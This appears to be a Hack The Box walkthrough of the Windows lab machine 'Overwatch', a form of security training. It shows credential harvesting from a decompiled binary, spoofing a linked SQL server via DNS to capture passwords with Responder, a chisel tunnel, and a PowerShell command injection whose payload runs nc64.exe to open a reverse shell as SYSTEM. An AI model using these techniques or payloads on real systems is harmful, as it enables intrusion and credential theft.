Hack The Box / WINDOWS / 2026-05-09
Hack The Box — Overwatch (Windows)
SMB share recon and .NET decompilation reveal MSSQL credentials, a linked server spoof with DNS + Responder leaks new creds, WinRM access exposes an internal SOAP service, and a KillProcess command injection yields SYSTEM.
Target
- IP: 10.129.16.251
Port Scan
sudo nmap -sC -sV 10.129.16.251 -p- -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-26 18:17:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=S200401.overwatch.htb
| Issuer: commonName=S200401.overwatch.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-12-07T15:16:06
| Not valid after: 2026-06-08T15:16:06
| MD5: 0da8:f9a5:d788:e363:07b1:5f70:6524:ffcb
|_SHA-1: 3287:c62d:4408:7fbb:4038:00b3:32fa:da67:fb22:14bc
| rdp-ntlm-info:
| Target_Name: OVERWATCH
| NetBIOS_Domain_Name: OVERWATCH
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| DNS_Tree_Name: overwatch.htb
| Product_Version: 10.0.20348
|_ System_Time: 2026-01-26T18:18:42+00:00
|_ssl-date: 2026-01-26T18:19:22+00:00; +1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6520/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
|_ssl-date: 2026-01-26T18:19:22+00:00; +1s from scanner time.
| ms-sql-ntlm-info:
| 10.129.16.251:6520:
| Target_Name: OVERWATCH
| NetBIOS_Domain_Name: OVERWATCH
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| DNS_Tree_Name: overwatch.htb
|_ Product_Version: 10.0.20348
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-01-26T17:15:52
| Not valid after: 2056-01-26T17:15:52
| MD5: f402:4e42:3ae9:0f9d:0337:bed9:a4c9:b4ea
|_SHA-1: fe57:f213:48f5:9bff:e0e5:83f1:6015:857a:cac8:5b07
| ms-sql-info:
| 10.129.16.251:6520:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 6520
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
51470/tcp open msrpc Microsoft Windows RPC
51559/tcp open msrpc Microsoft Windows RPC
51797/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
51798/tcp open msrpc Microsoft Windows RPC
Service Info: Host: S200401; OS: Windows; CPE: cpe:/o:microsoft:windows
Host entries
Add these entries to /etc/hosts:
10.129.16.251 overwatch.htb
10.129.16.251 S200401.overwatch.htb
SMB Enumeration
List shares:
smbclient -N -L //10.129.16.251/
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
software$ Disk
SYSVOL Disk Logon server share
Access software$:
smbclient -N '//10.129.16.251/software$'
dir
. DH 0 Sat May 17 08:27:07 2025
.. DHS 0 Thu Jan 1 13:46:47 2026
Monitoring DH 0 Sat May 17 08:32:43 2025
cd Monitoring
dir
There is an overwatch.exe, several DLLs, and an overwatch.exe.config file.
Mount the share locally and copy its contents:
mkdir mnt
sudo mount -t cifs '//10.129.16.251/software$' ./mnt -o username=hello,password=
cd mnt
zip -r ../stuff.zip *
Unmount it:
sudo umount ./mnt
Unzip the archive:
unzip stuff.zip -d software
Now we have all files offline in the software folder.
Open the folder in VS Code, install ilspy-vscode, and open overwatch.exe.
Expand overwatch.exe and inspect the MonitoringService module.
We find this connection string:
private readonly string connectionString = "Server=localhost;Database=SecurityLogs;User Id=sqlsvc;Password=TI0LKcfHzZw1Vv;";
Credentials found:
sqlsvc / TI0LKcfHzZw1Vv
Credential Validation
Check SMB:
nxc smb 10.129.16.251 -u 'sqlsvc' -p 'TI0LKcfHzZw1Vv' --shares
SMB 10.129.16.251 445 S200401 [*] Windows Server 2022 Build 20348 x64 (name:S200401) (domain:overwatch.htb) (signing:True) (SMBv1:False)
SMB 10.129.16.251 445 S200401 [+] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv
SMB 10.129.16.251 445 S200401 [*] Enumerated shares
SMB 10.129.16.251 445 S200401 Share Permissions Remark
SMB 10.129.16.251 445 S200401 ----- ----------- ------
SMB 10.129.16.251 445 S200401 ADMIN$ Remote Admin
SMB 10.129.16.251 445 S200401 C$ Default share
SMB 10.129.16.251 445 S200401 IPC$ READ Remote IPC
SMB 10.129.16.251 445 S200401 NETLOGON READ Logon server share
SMB 10.129.16.251 445 S200401 software$ READ
SMB 10.129.16.251 445 S200401 SYSVOL READ Logon server share
The credentials are valid for SMB.
Check LDAP:
nxc ldap 10.129.16.251 -u 'sqlsvc' -p 'TI0LKcfHzZw1Vv'
LDAP 10.129.16.251 389 S200401 [*] Windows Server 2022 Build 20348 (name:S200401) (domain:overwatch.htb)
LDAP 10.129.16.251 389 S200401 [+] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv
They also work for LDAP.
BloodHound and LDAP domain dump
Collect BloodHound data:
bloodhound-ce-python -u 'sqlsvc' -p 'TI0LKcfHzZw1Vv' -ns 10.129.16.251 -d 'overwatch.htb' -dc S200401.overwatch.htb -c All --zip
We get a ZIP.
Start BloodHound and import the ZIP. On Kali Linux:
sudo bloodhound
We can also enumerate the domain with ldapdomaindump:
ldapdomaindump 10.129.16.251 -u 'overwatch.htb\sqlsvc' -p 'TI0LKcfHzZw1Vv'
We see many users and several computers. The DC is S200401.overwatch.htb.
BloodHound does not show any special ACLs for sqlsvc, so we try MSSQL next.
MSSQL Access
Verify MSSQL login:
nxc mssql 10.129.16.251 --port 6520 -u 'sqlsvc' -p 'TI0LKcfHzZw1Vv'
MSSQL 10.129.16.251 6520 S200401 [*] Windows Server 2022 Build 20348 (name:S200401) (domain:overwatch.htb)
MSSQL 10.129.16.251 6520 S200401 [+] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv
Connect with mssqlclient.py:
mssqlclient.py -port 6520 -windows-auth 'OVERWATCH'/'sqlsvc':'TI0LKcfHzZw1Vv'@10.129.16.251
We get an MSSQL shell.
enum_db
name is_trustworthy_on
--------- -----------------
master 0
tempdb 0
model 0
msdb 1
overwatch 0
Enumerate tables:
select name from overwatch..sysobjects where xtype = 'U'
name
--------
Eventlog
Select the DB:
use overwatch
The prompt changes to:
SQL (OVERWATCH\sqlsvc dbo@overwatch)>
So we are DB owner and can do anything in this database.
Inspect the table schema:
SELECT COLUMN_NAME, DATA_TYPE, CHARACTER_MAXIMUM_LENGTH, IS_NULLABLE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'Eventlog';
COLUMN_NAME DATA_TYPE CHARACTER_MAXIMUM_LENGTH IS_NULLABLE
----------- --------- ------------------------ -----------
Id int NULL b'NO'
Timestamp datetime NULL b'YES'
EventType varchar -1 b'YES'
Details varchar -1 b'YES'
Query the data:
select * from Eventlog;
No rows are present.
Check linked servers:
enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
------------------ ---------------- ----------- ------------------ ------------------ ------------ -------
S200401\SQLEXPRESS SQLNCLI SQL Server S200401\SQLEXPRESS NULL NULL NULL
SQL07 SQLNCLI SQL Server SQL07 NULL NULL NULL
Linked Server Local Login Is Self Mapping Remote Login
------------- ----------- --------------- ------------
Trying:
EXEC ('SELECT 1') AT [SQL07];
It times out, as if the server is unreachable. The idea is to spoof it and capture credentials.
Spoof linked server and capture credentials
We will add a DNS entry named SQL07 pointing to our IP.
Download BloodyAD: https://github.com/CravateRouge/bloodyAD
python3 bloodyAD/bloodyAD.py --host S200401.overwatch.htb -d overwatch.htb --dc-ip 10.129.244.81 -u 'sqlsvc' -p 'TI0LKcfHzZw1Vv' add dnsRecord 'SQL07' 10.10.14.29
[+] SQL07 has been successfully added
Start Responder:
sudo responder -I tun0
In the SQL shell, run:
EXEC ('SELECT 1') AT [SQL07];
Responder output:
[MSSQL] Cleartext Client : 10.129.244.81
[MSSQL] Cleartext Hostname : SQL07 ()
[MSSQL] Cleartext Username : sqlmgmt
[MSSQL] Cleartext Password : bIhBbzMMnB82yx
From BloodHound, sqlmgmt is in the Remote Management Users group, so we can use WinRM:
evil-winrm -i 10.129.244.81 -u sqlmgmt -p 'bIhBbzMMnB82yx'
Internal service on port 8000
Check listening ports:
netstat -a -p tcp
We notice:
TCP 0.0.0.0:8000 S200401:0 LISTENING
Nmap did not report port 8000, so it is most likely blocked from the outside by the host firewall and only reachable locally.
Port 8000 is used by overwatch.exe, as we can see in the source. In overwatch.exe.config we find:
<baseAddresses>
<add baseAddress="http://overwatch.htb:8000/MonitorService" />
</baseAddresses>
Port forwarding with chisel
Download chisel: https://github.com/jpillora/chisel (Windows and Linux).
Upload the Windows binary to the victim.
On the attacker machine:
./chisel_linux server --reverse --port 9999
On the victim:
.\chisel_windows.exe client http://10.10.17.57:9999 R:8000
Browse to:
http://127.0.0.1:8000/MonitorService
The page says the WSDL is available at:
http://overwatch.htb:8000/MonitorService?singleWsdl
Since we forwarded the port, use 127.0.0.1:
curl 'http://127.0.0.1:8000/MonitorService?singleWsdl' > test.xml
xmllint --format test.xml > test_formatted.xml && mv test_formatted.xml test.xml
Add this entry to /etc/hosts:
127.0.0.1 overwatch.htb
The test.xml file contains the service definition. We can use the zeep Python library to parse it and call SOAP functions. Because of the port forward, we must reference 127.0.0.1.
Command injection in KillProcess
Among the SOAP methods, there is a KillProcess function:
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;

public string KillProcess(string processName)
{
    // The caller-controlled name is spliced directly into PowerShell script text.
    string scriptContents = "Stop-Process -Name " + processName + " -Force";
    try
    {
        using Runspace runspace = RunspaceFactory.CreateRunspace();
        runspace.Open();
        using Pipeline pipeline = runspace.CreatePipeline();
        // AddScript parses the whole string as code, so any PowerShell syntax
        // inside processName is executed by the service account.
        pipeline.Commands.AddScript(scriptContents);
        pipeline.Commands.Add("Out-String");
        Collection<PSObject> collection = pipeline.Invoke();
        runspace.Close();
        StringBuilder stringBuilder = new StringBuilder();
        foreach (PSObject item in collection)
        {
            stringBuilder.AppendLine(item.ToString());
        }
        return stringBuilder.ToString();
    }
    catch (Exception ex)
    {
        return "Error: " + ex.Message;
    }
}
This is clearly a command injection vulnerability. We can set processName to:
$(C:\tmp\nc64.exe -e cmd.exe 10.10.17.57 4444)
It will execute our payload and spawn a reverse shell. See command_injection_soap.py in the attachments folder.
Download nc64.exe from:
https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe
Upload it to C:\tmp on the victim (create the folder if it does not exist).
SYSTEM shell
Start a listener:
rlwrap nc -vlnp 4444
Run the script:
python3 command_injection_soap.py
We get a reverse shell:
whoami
nt authority\system